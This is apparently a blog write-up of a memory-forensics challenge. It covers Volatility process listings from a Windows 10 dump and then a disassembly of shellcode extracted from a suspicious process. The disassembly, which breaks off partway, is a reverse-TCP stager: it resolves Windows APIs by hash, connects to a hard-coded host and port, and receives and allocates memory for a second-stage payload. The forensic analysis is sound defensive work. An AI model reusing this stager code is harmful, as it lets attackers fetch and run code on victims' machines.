[Challenge] Find Frog - incident-response-challenge.com
2022. 3. 24. 15:05ㆍ0x0C Forensic/IR
728x90
Keyword: Memory Dump
The investigator gained one dump file. The table shows the default option is below related to the dump file. The Result of the NtMajorVersion is 10. In other words, the system is working on Windows 10 OS.
| Kernel Base 0xf8002ec04000 DTB 0x1ab000 Symbols file:///home/kali/Desktop/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/D788F72ABE964EFCACAAD0276DAAE6CB-1.json.xz Is64Bit True IsPAE False layer_name 0 WindowsIntel32e memory_layer 1 WindowsCrashDump64Layer base_layer 2 FileLayer KdVersionBlock 0xf8002ef3eff0 Major/Minor 15.15063 MachineType 34404 KeNumberProcessors 2 SystemTime 2020-02-13 15:13:33 NtSystemRoot C:\Windows NtProductType NtProductWinNt NtMajorVersion 10 NtMinorVersion 0 PE MajorOperatingSystemVersion 10 PE MinorOperatingSystemVersion 0 PE Machine 34404 PE TimeDateStamp Sat Mar 18 04:40:44 2017 |
The memory dump can check which process it has.
| └─$ python3 vol.py -f ../THEEYRIE.dmp windows.pslist.PsList |
| Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output 4 0 System 0xbf8a4b651040 120 - N/A False 2020-02-11 13:53:49.000000 N/A Disabled 300 4 smss.exe 0xbf8a4bb9b7c0 4 - N/A False 2020-02-11 13:53:49.000000 N/A Disabled 408 400 csrss.exe 0xbf8a4d8257c0 12 - 0 False 2020-02-11 13:53:53.000000 N/A Disabled 488 300 smss.exe 0xbf8a4d9d8080 0 - 1 False 2020-02-11 13:53:54.000000 2020-02-11 13:53:54.000000 Disabled 496 400 wininit.exe 0xbf8a4da68080 4 - 0 False 2020-02-11 13:53:54.000000 N/A Disabled 504 488 csrss.exe 0xbf8a4d9937c0 13 - 1 False 2020-02-11 13:53:54.000000 N/A Disabled 576 488 winlogon.exe 0xbf8a4dac8080 6 - 1 False 2020-02-11 13:53:54.000000 N/A Disabled 636 496 services.exe 0xbf8a4db6b080 21 - 0 False 2020-02-11 13:53:54.000000 N/A Disabled 644 496 lsass.exe 0xbf8a4dbbc080 15 - 0 False 2020-02-11 13:53:55.000000 N/A Disabled 724 576 fontdrvhost.ex 0xbf8a4de257c0 6 - 1 False 2020-02-11 13:53:56.000000 N/A Disabled 732 496 fontdrvhost.ex 0xbf8a4bb0d7c0 6 - 0 False 2020-02-11 13:53:56.000000 N/A Disabled 740 636 svchost.exe 0xbf8a4dbfb7c0 41 - 0 False 2020-02-11 13:53:56.000000 N/A Disabled 856 636 svchost.exe 0xbf8a4dcc5640 18 - 0 False 2020-02-11 13:53:56.000000 N/A Disabled 984 576 dwm.exe 0xbf8a4dd927c0 11 - 1 False 2020-02-11 13:53:57.000000 N/A Disabled 68 636 svchost.exe 0xbf8a4dd297c0 100 - 0 False 2020-02-11 13:53:57.000000 N/A Disabled 288 636 svchost.exe 0xbf8a4ddbc480 29 - 0 False 2020-02-11 13:53:57.000000 N/A Disabled 344 636 svchost.exe 0xbf8a4ddc8380 18 - 0 False 2020-02-11 13:53:57.000000 N/A Disabled 412 636 svchost.exe 0xbf8a4ddd07c0 47 - 0 False 2020-02-11 13:53:57.000000 N/A Disabled 696 636 svchost.exe 0xbf8a4ddf73c0 29 - 0 False 2020-02-11 13:53:57.000000 N/A Disabled 700 636 svchost.exe 0xbf8a4de4c280 23 - 0 False 2020-02-11 13:53:57.000000 N/A Disabled 1428 636 svchost.exe 0xbf8a4df2e600 9 - 0 False 2020-02-11 13:53:58.000000 N/A Disabled 1584 636 svchost.exe 0xbf8a4df9f080 5 - 0 False 2020-02-11 13:53:58.000000 N/A Disabled 1596 636 svchost.exe 0xbf8a4dfb07c0 12 - 0 False 2020-02-11 13:53:58.000000 N/A Disabled 1636 636 svchost.exe 0xbf8a4dfc8080 11 - 0 False 2020-02-11 13:53:58.000000 N/A Disabled 1788 636 spoolsv.exe 0xbf8a4e0907c0 15 - 0 False 2020-02-11 13:54:00.000000 N/A Disabled 1984 636 svchost.exe 0xbf8a4e0fd580 14 - 0 False 2020-02-11 13:54:00.000000 N/A Disabled 2012 636 SecurityHealth 0xbf8a4e104080 10 - 0 False 2020-02-11 13:54:00.000000 N/A Disabled 936 636 VGAuthService. 0xbf8a4e148580 4 - 0 False 2020-02-11 13:54:00.000000 N/A Disabled 1156 636 vmtoolsd.exe 0xbf8a4e14b7c0 11 - 0 False 2020-02-11 13:54:00.000000 N/A Disabled 1152 636 MsMpEng.exe 0xbf8a4e1537c0 31 - 0 False 2020-02-11 13:54:00.000000 N/A Disabled 2052 4 MemCompression 0xbf8a4e19d040 50 - N/A False 2020-02-11 13:54:01.000000 N/A Disabled 2428 740 WmiPrvSE.exe 0xbf8a4b8627c0 11 - 0 False 2020-02-13 15:02:18.000000 N/A Disabled 2652 636 dllhost.exe 0xbf8a4e3ce2c0 16 - 0 False 2020-02-13 15:02:20.000000 N/A Disabled 2772 636 svchost.exe 0xbf8a4e33e500 29 - 0 False 2020-02-13 15:02:21.000000 N/A Disabled 2880 636 msdtc.exe 0xbf8a4e4267c0 13 - 0 False 2020-02-13 15:02:22.000000 N/A Disabled 3400 636 NisSrv.exe 0xbf8a4e7cb600 11 - 0 False 2020-02-13 15:02:33.000000 N/A Disabled 3480 740 WmiPrvSE.exe 0xbf8a4e9cf080 10 - 0 False 2020-02-13 15:02:37.000000 N/A Disabled 3588 68 sihost.exe 0xbf8a4d4157c0 23 - 1 False 2020-02-13 15:02:38.000000 N/A Disabled 3596 636 svchost.exe 0xbf8a4d4287c0 18 - 1 False 2020-02-13 15:02:39.000000 N/A Disabled 3752 68 taskhostw.exe 0xbf8a4d4707c0 17 - 1 False 2020-02-13 15:02:41.000000 N/A Disabled 2804 576 userinit.exe 0xbf8a4e3715c0 0 - 1 False 2020-02-13 15:02:50.000000 2020-02-13 15:03:31.000000 Disabled 3068 2804 explorer.exe 0xbf8a4ecbe7c0 82 - 1 False 2020-02-13 15:02:50.000000 N/A Disabled 4328 636 SearchIndexer. 0xbf8a4dfed7c0 19 - 0 False 2020-02-13 15:03:09.000000 N/A Disabled 4532 740 ShellExperienc 0xbf8a4ee7d080 44 - 1 False 2020-02-13 15:03:11.000000 N/A Disabled 4560 740 SearchUI.exe 0xbf8a4ed797c0 39 - 1 False 2020-02-13 15:03:11.000000 N/A Disabled 4808 740 RuntimeBroker. 0xbf8a4ec217c0 27 - 1 False 2020-02-13 15:03:12.000000 N/A Disabled 444 740 SkypeHost.exe 0xbf8a4f1027c0 10 - 1 False 2020-02-13 15:03:17.000000 N/A Disabled 6052 3068 MSASCuiL.exe 0xbf8a4baf7080 4 - 1 False 2020-02-13 15:03:30.000000 N/A Disabled 6104 3068 vm3dservice.ex 0xbf8a4baff7c0 4 - 1 False 2020-02-13 15:03:30.000000 N/A Disabled 6128 3068 vmtoolsd.exe 0xbf8a4baca080 8 - 1 False 2020-02-13 15:03:31.000000 N/A Disabled 3112 3068 OneDrive.exe 0xbf8a4ed237c0 21 - 1 True 2020-02-13 15:03:34.000000 N/A Disabled 980 636 svchost.exe 0xbf8a4f06a080 9 - 0 False 2020-02-13 15:03:55.000000 N/A Disabled 5984 636 svchost.exe 0xbf8a4c168080 6 - 0 False 2020-02-13 15:09:22.000000 N/A Disabled 1804 1428 audiodg.exe 0xbf8a4bed1080 7 - 0 False 2020-02-13 15:09:24.000000 N/A Disabled 4344 636 TrustedInstall 0xbf8a4bf4c080 5 - 0 False 2020-02-13 15:09:40.000000 N/A Disabled 2624 740 TiWorker.exe 0xbf8a4bf8d080 4 - 0 False 2020-02-13 15:09:41.000000 N/A Disabled 4148 740 smartscreen.ex 0xbf8a4c1a67c0 23 - 1 False 2020-02-13 15:09:46.000000 N/A Disabled 976 740 dllhost.exe 0xbf8a4c14f7c0 9 - 1 False 2020-02-13 15:09:46.000000 N/A Disabled 5428 740 ApplicationFra 0xbf8a4bfe47c0 15 - 1 False 2020-02-13 15:10:17.000000 N/A Disabled 7184 740 dllhost.exe 0xbf8a4c1bc7c0 6 - 1 False 2020-02-13 15:11:28.000000 N/A Disabled 3624 7916 GoogleCrashHan 0xbf8a4d6747c0 5 - 0 True 2020-02-13 15:11:53.000000 N/A Disabled 8032 7916 GoogleCrashHan 0xbf8a4d9516c0 5 - 0 False 2020-02-13 15:11:53.000000 N/A Disabled 2764 6324 chrome.exe 0xbf8a4c3d6080 0 - 1 False 2020-02-13 15:11:54.000000 2020-02-13 15:12:07.000000 Disabled 6836 740 backgroundTask 0xbf8a4d70b7c0 16 - 1 False 2020-02-13 15:12:02.000000 N/A Disabled 5804 3068 cmd.exe 0xbf8a4be58080 1 - 1 False 2020-02-13 15:12:18.000000 N/A Disabled 2976 5804 conhost.exe 0xbf8a4f02a7c0 5 - 1 False 2020-02-13 15:12:18.000000 N/A Disabled 6140 7448 MpCmdRun.exe 0xbf8a4c680080 7 - 0 False 2020-02-13 15:12:33.000000 N/A Disabled 6152 3068 notepad.exe 0xbf8a4c064080 4 - 1 False 2020-02-13 15:12:52.000000 N/A Disabled 7728 740 MicrosoftEdge. 0xbf8a4dcb17c0 49 - 1 False 2020-02-13 15:12:58.000000 N/A Disabled 6956 740 browser_broker 0xbf8a4d629500 10 - 1 False 2020-02-13 15:12:59.000000 N/A Disabled 3820 740 MicrosoftEdgeC 0xbf8a4bcb93c0 13 - 1 False 2020-02-13 15:13:01.000000 N/A Disabled 6240 6660 MpCmdRun.exe 0xbf8a4bda77c0 10 - 0 False 2020-02-13 15:13:02.000000 N/A Disabled 8108 740 MicrosoftEdgeC 0xbf8a4c6137c0 0 - 1 False 2020-02-13 15:13:02.000000 2020-02-13 15:13:27.000000 Disabled 6824 740 InstallAgent.e 0xbf8a4bfc47c0 7 - 1 False 2020-02-13 15:13:02.000000 N/A Disabled 6252 740 MicrosoftEdgeC 0xbf8a4bedd080 0 - 1 False 2020-02-13 15:13:03.000000 2020-02-13 15:13:24.000000 Disabled 6440 740 MicrosoftEdgeC 0xbf8a4d86b080 42 - 1 False 2020-02-13 15:13:05.000000 N/A Disabled 8008 6240 mpam-4baaea55. 0xbf8a4bd537c0 3 - 0 False 2020-02-13 15:13:10.000000 N/A Disabled 6028 636 svchost.exe 0xbf8a4d3467c0 7 - 0 False 2020-02-13 15:13:11.000000 N/A Disabled 1996 4064 chrome.exe 0xbf8a4be88080 1 - 1 False 2020-02-13 15:13:19.000000 N/A Disabled 5244 8008 MpSigStub.exe 0xbf8a4c612080 6 - 0 False 2020-02-13 15:13:20.000000 N/A Disabled 6200 740 MicrosoftEdgeC 0xbf8a4d18b080 39 - 1 False 2020-02-13 15:13:27.000000 N/A Disabled 7336 740 MicrosoftEdgeC 0xbf8a4c6b6080 0 - 1 False 2020-02-13 15:13:28.000000 2020-02-13 15:13:50.000000 Disabled 7996 3068 DumpIt.exe 0xbf8a4d82b080 6 - 1 False 2020-02-13 15:13:31.000000 N/A Disabled 4004 7996 conhost.exe 0xbf8a4bf03080 5 - 1 False 2020-02-13 15:13:31.000000 N/A Disabled 3084 740 dllhost.exe 0xbf8a4e702080 0 - 1 False 2020-02-13 15:13:37.000000 2020-02-13 15:13:42.000000 Disabled |
According to the scanning, the investigator recognised that the dump did not have a unique process name. Hence, the investigator guesses the processing technique is hollowing.
| └─$ python3 vol.py -f ../THEEYRIE.dmp windows.pstree.PsTree |
| Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime 4 0 System 0xbf8a4b651040 120 - N/A False 2020-02-11 13:53:49.000000 N/A * 300 4 smss.exe 0xbf8a4bb9b7c0 4 - N/A False 2020-02-11 13:53:49.000000 N/A ** 488 300 smss.exe 0xbf8a4d9d8080 0 - 1 False 2020-02-11 13:53:54.000000 2020-02-11 13:53:54.000000 *** 504 488 csrss.exe 0xbf8a4d9937c0 13 - 1 False 2020-02-11 13:53:54.000000 N/A *** 576 488 winlogon.exe 0xbf8a4dac8080 6 - 1 False 2020-02-11 13:53:54.000000 N/A **** 984 576 dwm.exe 0xbf8a4dd927c0 11 - 1 False 2020-02-11 13:53:57.000000 N/A **** 724 576 fontdrvhost.ex 0xbf8a4de257c0 6 - 1 False 2020-02-11 13:53:56.000000 N/A **** 2804 576 userinit.exe 0xbf8a4e3715c0 0 - 1 False 2020-02-13 15:02:50.000000 2020-02-13 15:03:31.000000 ***** 3068 2804 explorer.exe 0xbf8a4ecbe7c0 82 - 1 False 2020-02-13 15:02:50.000000 N/A ****** 6052 3068 MSASCuiL.exe 0xbf8a4baf7080 4 - 1 False 2020-02-13 15:03:30.000000 N/A ****** 3112 3068 OneDrive.exe 0xbf8a4ed237c0 21 - 1 True 2020-02-13 15:03:34.000000 N/A ****** 6152 3068 notepad.exe 0xbf8a4c064080 4 - 1 False 2020-02-13 15:12:52.000000 N/A ****** 5804 3068 cmd.exe 0xbf8a4be58080 1 - 1 False 2020-02-13 15:12:18.000000 N/A ******* 2976 5804 conhost.exe 0xbf8a4f02a7c0 5 - 1 False 2020-02-13 15:12:18.000000 N/A ****** 6128 3068 vmtoolsd.exe 0xbf8a4baca080 8 - 1 False 2020-02-13 15:03:31.000000 N/A ****** 6104 3068 vm3dservice.ex 0xbf8a4baff7c0 4 - 1 False 2020-02-13 15:03:30.000000 N/A ****** 7996 3068 DumpIt.exe 0xbf8a4d82b080 6 - 1 False 2020-02-13 15:13:31.000000 N/A ******* 4004 7996 conhost.exe 0xbf8a4bf03080 5 - 1 False 2020-02-13 15:13:31.000000 N/A * 2052 4 MemCompression 0xbf8a4e19d040 50 - N/A False 2020-02-11 13:54:01.000000 N/A 408 400 csrss.exe 0xbf8a4d8257c0 12 - 0 False 2020-02-11 13:53:53.000000 N/A 496 400 wininit.exe 0xbf8a4da68080 4 - 0 False 2020-02-11 13:53:54.000000 N/A * 644 496 lsass.exe 0xbf8a4dbbc080 15 - 0 False 2020-02-11 13:53:55.000000 N/A * 732 496 fontdrvhost.ex 0xbf8a4bb0d7c0 6 - 0 False 2020-02-11 13:53:56.000000 N/A * 636 496 services.exe 0xbf8a4db6b080 21 - 0 False 2020-02-11 13:53:54.000000 N/A ** 1152 636 MsMpEng.exe 0xbf8a4e1537c0 31 - 0 False 2020-02-11 13:54:00.000000 N/A ** 1156 636 vmtoolsd.exe 0xbf8a4e14b7c0 11 - 0 False 2020-02-11 13:54:00.000000 N/A ** 3596 636 svchost.exe 0xbf8a4d4287c0 18 - 1 False 2020-02-13 15:02:39.000000 N/A ** 6028 636 svchost.exe 0xbf8a4d3467c0 7 - 0 False 2020-02-13 15:13:11.000000 N/A ** 1428 636 svchost.exe 0xbf8a4df2e600 9 - 0 False 2020-02-11 13:53:58.000000 N/A *** 1804 1428 audiodg.exe 0xbf8a4bed1080 7 - 0 False 2020-02-13 15:09:24.000000 N/A ** 412 636 svchost.exe 0xbf8a4ddd07c0 47 - 0 False 2020-02-11 13:53:57.000000 N/A ** 288 636 svchost.exe 0xbf8a4ddbc480 29 - 0 False 2020-02-11 13:53:57.000000 N/A ** 936 636 VGAuthService. 0xbf8a4e148580 4 - 0 False 2020-02-11 13:54:00.000000 N/A ** 1584 636 svchost.exe 0xbf8a4df9f080 5 - 0 False 2020-02-11 13:53:58.000000 N/A ** 696 636 svchost.exe 0xbf8a4ddf73c0 29 - 0 False 2020-02-11 13:53:57.000000 N/A ** 700 636 svchost.exe 0xbf8a4de4c280 23 - 0 False 2020-02-11 13:53:57.000000 N/A ** 1596 636 svchost.exe 0xbf8a4dfb07c0 12 - 0 False 2020-02-11 13:53:58.000000 N/A ** 1984 636 svchost.exe 0xbf8a4e0fd580 14 - 0 False 2020-02-11 13:54:00.000000 N/A ** 2880 636 msdtc.exe 0xbf8a4e4267c0 13 - 0 False 2020-02-13 15:02:22.000000 N/A ** 68 636 svchost.exe 0xbf8a4dd297c0 100 - 0 False 2020-02-11 13:53:57.000000 N/A *** 3752 68 taskhostw.exe 0xbf8a4d4707c0 17 - 1 False 2020-02-13 15:02:41.000000 N/A *** 3588 68 sihost.exe 0xbf8a4d4157c0 23 - 1 False 2020-02-13 15:02:38.000000 N/A ** 3400 636 NisSrv.exe 0xbf8a4e7cb600 11 - 0 False 2020-02-13 15:02:33.000000 N/A ** 2772 636 svchost.exe 0xbf8a4e33e500 29 - 0 False 2020-02-13 15:02:21.000000 N/A ** 980 636 svchost.exe 0xbf8a4f06a080 9 - 0 False 2020-02-13 15:03:55.000000 N/A ** 344 636 svchost.exe 0xbf8a4ddc8380 18 - 0 False 2020-02-11 13:53:57.000000 N/A ** 856 636 svchost.exe 0xbf8a4dcc5640 18 - 0 False 2020-02-11 13:53:56.000000 N/A ** 2012 636 SecurityHealth 0xbf8a4e104080 10 - 0 False 2020-02-11 13:54:00.000000 N/A ** 2652 636 dllhost.exe 0xbf8a4e3ce2c0 16 - 0 False 2020-02-13 15:02:20.000000 N/A ** 5984 636 svchost.exe 0xbf8a4c168080 6 - 0 False 2020-02-13 15:09:22.000000 N/A ** 740 636 svchost.exe 0xbf8a4dbfb7c0 41 - 0 False 2020-02-11 13:53:56.000000 N/A *** 3084 740 dllhost.exe 0xbf8a4e702080 0 - 1 False 2020-02-13 15:13:37.000000 2020-02-13 15:13:42.000000 *** 7184 740 dllhost.exe 0xbf8a4c1bc7c0 6 - 1 False 2020-02-13 15:11:28.000000 N/A *** 3480 740 WmiPrvSE.exe 0xbf8a4e9cf080 10 - 0 False 2020-02-13 15:02:37.000000 N/A *** 6824 740 InstallAgent.e 0xbf8a4bfc47c0 7 - 1 False 2020-02-13 15:13:02.000000 N/A *** 6440 740 MicrosoftEdgeC 0xbf8a4d86b080 42 - 1 False 2020-02-13 15:13:05.000000 N/A *** 7336 740 MicrosoftEdgeC 0xbf8a4c6b6080 0 - 1 False 2020-02-13 15:13:28.000000 2020-02-13 15:13:50.000000 *** 6956 740 browser_broker 0xbf8a4d629500 10 - 1 False 2020-02-13 15:12:59.000000 N/A *** 8108 740 MicrosoftEdgeC 0xbf8a4c6137c0 0 - 1 False 2020-02-13 15:13:02.000000 2020-02-13 15:13:27.000000 *** 7728 740 MicrosoftEdge. 0xbf8a4dcb17c0 49 - 1 False 2020-02-13 15:12:58.000000 N/A *** 4532 740 ShellExperienc 0xbf8a4ee7d080 44 - 1 False 2020-02-13 15:03:11.000000 N/A *** 4148 740 smartscreen.ex 0xbf8a4c1a67c0 23 - 1 False 2020-02-13 15:09:46.000000 N/A *** 5428 740 ApplicationFra 0xbf8a4bfe47c0 15 - 1 False 2020-02-13 15:10:17.000000 N/A *** 6836 740 backgroundTask 0xbf8a4d70b7c0 16 - 1 False 2020-02-13 15:12:02.000000 N/A *** 6200 740 MicrosoftEdgeC 0xbf8a4d18b080 39 - 1 False 2020-02-13 15:13:27.000000 N/A *** 444 740 SkypeHost.exe 0xbf8a4f1027c0 10 - 1 False 2020-02-13 15:03:17.000000 N/A *** 2624 740 TiWorker.exe 0xbf8a4bf8d080 4 - 0 False 2020-02-13 15:09:41.000000 N/A *** 4808 740 RuntimeBroker. 0xbf8a4ec217c0 27 - 1 False 2020-02-13 15:03:12.000000 N/A *** 4560 740 SearchUI.exe 0xbf8a4ed797c0 39 - 1 False 2020-02-13 15:03:11.000000 N/A *** 976 740 dllhost.exe 0xbf8a4c14f7c0 9 - 1 False 2020-02-13 15:09:46.000000 N/A *** 3820 740 MicrosoftEdgeC 0xbf8a4bcb93c0 13 - 1 False 2020-02-13 15:13:01.000000 N/A *** 6252 740 MicrosoftEdgeC 0xbf8a4bedd080 0 - 1 False 2020-02-13 15:13:03.000000 2020-02-13 15:13:24.000000 *** 2428 740 WmiPrvSE.exe 0xbf8a4b8627c0 11 - 0 False 2020-02-13 15:02:18.000000 N/A ** 1636 636 svchost.exe 0xbf8a4dfc8080 11 - 0 False 2020-02-11 13:53:58.000000 N/A ** 4328 636 SearchIndexer. 0xbf8a4dfed7c0 19 - 0 False 2020-02-13 15:03:09.000000 N/A ** 4344 636 TrustedInstall 0xbf8a4bf4c080 5 - 0 False 2020-02-13 15:09:40.000000 N/A ** 1788 636 spoolsv.exe 0xbf8a4e0907c0 15 - 0 False 2020-02-11 13:54:00.000000 N/A 3624 7916 GoogleCrashHan 0xbf8a4d6747c0 5 - 0 True 2020-02-13 15:11:53.000000 N/A 8032 7916 GoogleCrashHan 0xbf8a4d9516c0 5 - 0 False 2020-02-13 15:11:53.000000 N/A 2764 6324 chrome.exe 0xbf8a4c3d6080 0 - 1 False 2020-02-13 15:11:54.000000 2020-02-13 15:12:07.000000 6140 7448 MpCmdRun.exe 0xbf8a4c680080 7 - 0 False 2020-02-13 15:12:33.000000 N/A 6240 6660 MpCmdRun.exe 0xbf8a4bda77c0 10 - 0 False 2020-02-13 15:13:02.000000 N/A * 8008 6240 mpam-4baaea55. 0xbf8a4bd537c0 3 - 0 False 2020-02-13 15:13:10.000000 N/A ** 5244 8008 MpSigStub.exe 0xbf8a4c612080 6 - 0 False 2020-02-13 15:13:20.000000 N/A 1996 4064 chrome.exe 0xbf8a4be88080 1 - 1 False 2020-02-13 15:13:19.000000 N/A |
| python3 vol.py -f ../THEEYRIE.dmp windows.pslist --pid {pid} --dump |
[1] notepad.exe
[2] cmd.exe
[3] smartscreen.exe
[4] MpCmdRun.exe
[5] chrome.exe
When the investigator tried to copy this application, the file was detected easily via a windows defender.
The first data is \xFC. It meant the file associated with shellcode.
The shell code has a Windows API hash for obfuscation.
https://github.com/iagox86/nbtool/blob/master/samples/shellcode-win32/hash.py
GitHub - iagox86/nbtool
Contribute to iagox86/nbtool development by creating an account on GitHub.
github.com
000000000000 sub_0 proc near
seg000:0000000000000000
seg000:0000000000000000 var_38 = qword ptr -38h
seg000:0000000000000000
seg000:0000000000000000 cld
seg000:0000000000000001 and rsp, 0FFFFFFFFFFFFFFF0h
seg000:0000000000000005 call sub_D6
seg000:000000000000000A push r9
seg000:000000000000000C push r8
seg000:000000000000000E push rdx
seg000:000000000000000F push rcx
seg000:0000000000000010 push rsi
seg000:0000000000000011 xor rdx, rdx
seg000:0000000000000014 mov rdx, gs:[rdx+60h]
seg000:0000000000000019 mov rdx, [rdx+18h]
seg000:000000000000001D mov rdx, [rdx+20h]
seg000:0000000000000021
seg000:0000000000000021 loc_21: ; CODE XREF: sub_0+D1↓j
seg000:0000000000000021 mov rsi, [rdx+50h]
seg000:0000000000000025 movzx rcx, word ptr [rdx+4Ah]
seg000:000000000000002A xor r9, r9
seg000:000000000000002D
seg000:000000000000002D loc_2D: ; CODE XREF: sub_0+3E↓j
seg000:000000000000002D xor rax, rax
seg000:0000000000000030 lodsb
seg000:0000000000000031 cmp al, 61h ; 'a'
seg000:0000000000000033 jl short loc_37
seg000:0000000000000035 sub al, 20h ; ' '
seg000:0000000000000037
seg000:0000000000000037 loc_37: ; CODE XREF: sub_0+33↑j
seg000:0000000000000037 ror r9d, 0Dh
seg000:000000000000003B add r9d, eax
seg000:000000000000003E loop loc_2D
seg000:0000000000000040 push rdx
seg000:0000000000000041 push r9
seg000:0000000000000043 mov rdx, [rdx+20h]
seg000:0000000000000047 mov eax, [rdx+3Ch]
seg000:000000000000004A add rax, rdx
seg000:000000000000004D cmp word ptr [rax+18h], 20Bh
seg000:0000000000000053 jnz loc_CB
seg000:0000000000000059 mov eax, [rax+88h]
seg000:000000000000005F test rax, rax
seg000:0000000000000062 jz short loc_CB
seg000:0000000000000064 add rax, rdx
seg000:0000000000000067 push rax
seg000:0000000000000068 mov ecx, [rax+18h]
seg000:000000000000006B mov r8d, [rax+20h]
seg000:000000000000006F add r8, rdx
seg000:0000000000000072
seg000:0000000000000072 loc_72: ; CODE XREF: sub_0+98↓j
seg000:0000000000000072 jrcxz loc_CA
seg000:0000000000000074 dec rcx
seg000:0000000000000077 mov esi, [r8+rcx*4]
seg000:000000000000007B add rsi, rdx
seg000:000000000000007E xor r9, r9
seg000:0000000000000081
seg000:0000000000000081 loc_81: ; CODE XREF: sub_0+8E↓j
seg000:0000000000000081 xor rax, rax
seg000:0000000000000084 lodsb
seg000:0000000000000085 ror r9d, 0Dh
seg000:0000000000000089 add r9d, eax
seg000:000000000000008C cmp al, ah
seg000:000000000000008E jnz short loc_81
seg000:0000000000000090 add r9, [rsp+40h+var_38]
seg000:0000000000000095 cmp r9d, r10d
seg000:0000000000000098 jnz short loc_72
seg000:000000000000009A pop rax
seg000:000000000000009B mov r8d, [rax+24h]
seg000:000000000000009F add r8, rdx
seg000:00000000000000A2 mov cx, [r8+rcx*2]
seg000:00000000000000A7 mov r8d, [rax+1Ch]
seg000:00000000000000AB add r8, rdx
seg000:00000000000000AE mov eax, [r8+rcx*4]
seg000:00000000000000B2 add rax, rdx
seg000:00000000000000B5 pop r8
seg000:00000000000000B7 pop r8
seg000:00000000000000B9 pop rsi
seg000:00000000000000BA pop rcx
seg000:00000000000000BB pop rdx
seg000:00000000000000BC pop r8
seg000:00000000000000BE pop r9
seg000:00000000000000C0 pop r10
seg000:00000000000000C2 sub rsp, 20h
seg000:00000000000000C6 push r10
seg000:00000000000000C8 jmp rax
seg000:00000000000000CA ; ---------------------------------------------------------------------------
seg000:00000000000000CA
seg000:00000000000000CA loc_CA: ; CODE XREF: sub_0:loc_72↑j
seg000:00000000000000CA pop rax
seg000:00000000000000CB
seg000:00000000000000CB loc_CB: ; CODE XREF: sub_0+53↑j
seg000:00000000000000CB ; sub_0+62↑j
seg000:00000000000000CB pop r9
seg000:00000000000000CD pop rdx
seg000:00000000000000CE mov rdx, [rdx]
seg000:00000000000000D1 jmp loc_21
seg000:00000000000000D1 sub_0 endp
seg000:00000000000000D1
seg000:00000000000000D6
seg000:00000000000000D6 ; =============== S U B R O U T I N E =======================================
seg000:00000000000000D6
seg000:00000000000000D6
seg000:00000000000000D6 sub_D6 proc near ; CODE XREF: sub_0+5↑p
seg000:00000000000000D6 pop rbp
seg000:00000000000000D7 mov r14, '23_2sw'
seg000:00000000000000E1 push r14
seg000:00000000000000E3 mov r14, rsp
seg000:00000000000000E6 sub rsp, 1A0h
seg000:00000000000000ED mov r13, rsp
seg000:00000000000000F0 mov r12, 0C074234BB010002h
seg000:00000000000000FA push r12
seg000:00000000000000FC mov r12, rsp
seg000:00000000000000FF mov rcx, r14
seg000:0000000000000102 mov r10d, 726774Ch ; kernel32.dll!LoadLibraryA
seg000:0000000000000108 call rbp
seg000:000000000000010A mov rdx, r13
seg000:000000000000010D push 101h
seg000:0000000000000112 pop rcx
seg000:0000000000000113 mov r10d, 6B8029h ; ws2_32.dll!WSAStartup
seg000:0000000000000119 call rbp
seg000:000000000000011B push 0Ah
seg000:000000000000011D pop r14
seg000:000000000000011F
seg000:000000000000011F loc_11F: ; CODE XREF: sub_D6+108↓j
seg000:000000000000011F push rax
seg000:0000000000000120 push rax
seg000:0000000000000121 xor r9, r9
seg000:0000000000000124 xor r8, r8
seg000:0000000000000127 inc rax
seg000:000000000000012A mov rdx, rax
seg000:000000000000012D inc rax
seg000:0000000000000130 mov rcx, rax
seg000:0000000000000133 mov r10d, 0E0DF0FEAh ; ws2_32.dll!WSASocketA
seg000:0000000000000139 call rbp
seg000:000000000000013B mov rdi, rax
seg000:000000000000013E
seg000:000000000000013E loc_13E: ; CODE XREF: sub_D6+81↓j
seg000:000000000000013E push 10h
seg000:0000000000000140 pop r8
seg000:0000000000000142 mov rdx, r12
seg000:0000000000000145 mov rcx, rdi
seg000:0000000000000148 mov r10d, 6174A599h ; ws2_32.dll!connect
seg000:000000000000014E call rbp
seg000:0000000000000150 test eax, eax
seg000:0000000000000152 jz short loc_15E
seg000:0000000000000154 dec r14
seg000:0000000000000157 jnz short loc_13E
seg000:0000000000000159 call loc_1F1
seg000:000000000000015E
seg000:000000000000015E loc_15E: ; CODE XREF: sub_D6+7C↑j
seg000:000000000000015E sub rsp, 10h
seg000:0000000000000162 mov rdx, rsp
seg000:0000000000000165 xor r9, r9
seg000:0000000000000168 push 4
seg000:000000000000016A pop r8
seg000:000000000000016C mov rcx, rdi
seg000:000000000000016F mov r10d, 5FC8D902h ; ws2_32.dll!recv
seg000:0000000000000175 call rbp
seg000:0000000000000177 cmp eax, 0
seg000:000000000000017A jle short loc_1D1
seg000:000000000000017C add rsp, 20h
seg000:0000000000000180 pop rsi
seg000:0000000000000181 mov esi, esi
seg000:0000000000000183 push 40h ; '@'
seg000:0000000000000185 pop r9
seg000:0000000000000187 push 1000h
seg000:000000000000018C pop r8
seg000:000000000000018E mov rdx, rsi
seg000:0000000000000191 xor rcx, rcx
seg000:0000000000000194 mov r10d, 0E553A458h ; kernel32.dll!VirtualAlloc
seg000:000000000000019A call rbp
seg000:000000000000019C mov rbx, rax
seg000:000000000000019F mov r15, rax
seg000:00000000000001A2
seg000:00000000000001A2 loc_1A2: ; CODE XREF: sub_D6+116↓j
seg000:00000000000001A2 xor r9, r9
seg000:00000000000001A5 mov r8, rsi
seg000:00000000000001A8 mov rdx, rbx
seg000:00000000000001AB mov rcx, rdi
seg000:00000000000001AE mov r10d, 5FC8D902h ; ws2_32.dll!recv
seg000:00000000000001B4 call rbp
seg000:00000000000001B6 cmp eax, 0
seg000:00000000000001B9 jge short loc_1E3
seg000:00000000000001BB pop rax
seg000:00000000000001BC push r15
seg000:00000000000001BE pop rcx
seg000:00000000000001BF push 4000h
seg000:00000000000001C4 pop r8
seg000:00000000000001C6 push 0
seg000:00000000000001C8 pop rdx
seg000:00000000000001C9 mov r10d, 300F2F0Bh ; kernel32.dll!VirtualFree
seg000:00000000000001CF call rbp
seg000:00000000000001D1
seg000:00000000000001D1 loc_1D1: ; CODE XREF: sub_D6+A4↑j
seg000:00000000000001D1 push rdi
